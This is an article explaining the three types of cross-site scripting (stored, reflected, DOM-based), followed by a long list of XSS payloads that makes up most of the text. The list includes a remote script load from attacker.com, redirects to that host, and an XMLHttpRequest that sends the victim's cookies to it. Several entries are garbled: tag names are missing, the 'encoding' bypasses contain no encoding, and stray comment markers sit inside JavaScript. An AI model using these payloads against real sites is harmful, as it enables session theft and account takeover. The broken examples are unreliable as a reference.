XSS (Cross-Site Scripting) is a common network security vulnerability. Attackers inject malicious script code on trusted websites, and then make users execute These malicious codes, so as to achieve the purpose of attack. XSS attacks often occur on web applications that use insecure input validation and output encoding.
XSS attacks can be divided into three main types:
Stored XSS (Stored XSS): The attacker stores the malicious script code on the server of the target website, and then when other users visit the page containing the malicious code, the malicious code will be executed. This attack is common in websites that require persistent storage of user input, such as user message boards, forums, and blogs. For example, an attacker inserts malicious script in a forum comment, and when other users view the comment, the malicious script executes in their browsers.
Reflected XSS (Reflected XSS): The attacker constructs a link containing malicious scripts and tricks users into clicking the link. When the user clicks on the link, the malicious script will be sent to the server of the target website, and returned to the user’s browser in the server’s response, and then executed. This attack is commonly seen in scenarios where user input is passed through URL parameters. For example, an attacker constructs a malicious link that contains a malicious script that executes in the user’s browser when the link is clicked.
DOM-based XSS (DOM-based XSS): This type of XSS attack does not involve sending malicious scripts to the server, but uses JavaScript to modify the DOM structure of the page on the client side to perform malicious operations. The attack exploits direct manipulation of URL parameters or other user-controllable data by client-side code. For example, a website uses JavaScript to obtain URL parameters and insert them directly into the page. Without proper filtering and encoding, attackers can perform malicious operations by constructing malicious URL parameters.
The following are the various types of payloads:
basic
<script>alert('XSS')</script>
Bypass using HTML comments:
<!--><script>alert('XSS')</script>-->
Use JavaScript event handlers:
<img src="x" onerror="alert('XSS')">
Using the JavaScript URL pseudo-protocol:
<a href="javascript:alert('XSS')">Click Me</a>
Using the javascript:URL pseudo-protocol:
<a href="javascript:alert('XSS')">Click Me</a>
Using inline JavaScript code:
<a href="javascript:void(0)" onclick="alert('XSS')">Click Me</a>
Use HTML entity encoding:
<script>alert( 'XSS ')</script>
Use the onerror event of the img tag:
<img src="invalid" onerror="alert('XSS')">
Using an SVG image:
<svg/onload=alert('XSS')>
Using CSS expressions:
<div style="background-image: expression(alert('XSS'));">
Bypass filtering with special character encoding:
<script>alert(String. fromCharCode(88,83,83))</script>
Using document.write():
<script>document.write('XSS')</script>
Use the eval() function to execute malicious code:
<script>eval('alert("XSS")')</script>
Bypass filtering with URL encoding:
<script>alert(/XSS/)</script>
Bypass filtering using JavaScript comments:
<script>//alert('XSS')</script>
Attack with iframe:
<iframe src="javascript:alert('XSS')"></iframe>
Use a remote script file:
<script src="http://attacker.com/malicious.js"></script>
Use the onload event of the tag:
<img src="valid" onload="alert('XSS')">
Use the or tags:
<audio src="javascript:alert('XSS')"></audio>
<video src="javascript:alert('XSS')"></video>
Take advantage of JSONP:
<script src="http://attacker.com/endpoint?callback=alert"></script>
Use the tag:
<marquee onstart="alert('XSS')">Hover Me</marquee>
Use the onchange event of the tag:
<input type="text" onchange="alert('XSS')">
Use the onmouseover event:
<div onmouseover="alert('XSS')">Hover Me</div>
Redirect using window.location:
<script>location.href='http://attacker.com';</script>
Use document.cookie to get user cookie information:
<script>alert(document.cookie)</script>
Use localStorage or sessionStorage to store malicious data:
<script>localStorage.setItem('data', 'malicious')</script>
Send data using XMLHttpRequest:
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/?data=' + document.cookie, true);
xhr. send();
</script>
Use the onload event to redirect:
<script>
window.onload = function() {<!-- -->
window.location.href = 'http://attacker.com';
};
</script>
Use the onsubmit event to modify form data:
<form action="/" onsubmit="document.getElementById('password').value = 'malicious'">
<input type="password" id="password">
<input type="submit" value="Submit">
</form>
Use the onkeyup event of the tag:
<input type="text" onkeyup="alert('XSS')">
A javascript: URL utilizing the tag:
<a href="javascript:window.location='http://attacker.com'">Click Me</a>
Take advantage of the tags:
<textarea autofocus onfocus="alert('XSS')">Hover Me</textarea>
Take advantage of special tag attributes:
<div id="xss" data-attr="javascript:alert('XSS')"></div>
<script>document.getElementById('xss').dataset.attr</script>
Use innerHTML to modify the page content:
<script>document.body.innerHTML = 'XSS'</script>
Use the setTimeout() function to perform malicious actions:
<script>
setTimeout(function() {<!-- -->
alert('XSS');
}, 1000);
</script>
Use the or tags:
<object data="javascript:alert('XSS')"></object>
<embed src="javascript:alert('XSS')"></embed>
Using the Flash object:
<embed src="xss.swf">
Use HTML5’s postMessage() method:
<script>
window.postMessage('malicious', '*');
</script>
Use the url() function in CSS to perform malicious actions:
<style>
div {<!-- -->
background-image: url(javascript:alert('XSS'));
}
</style>
<div></div>
Use the onhashchange event:
<script>
window.onhashchange = function() {<!-- -->
alert('XSS');
};
</script>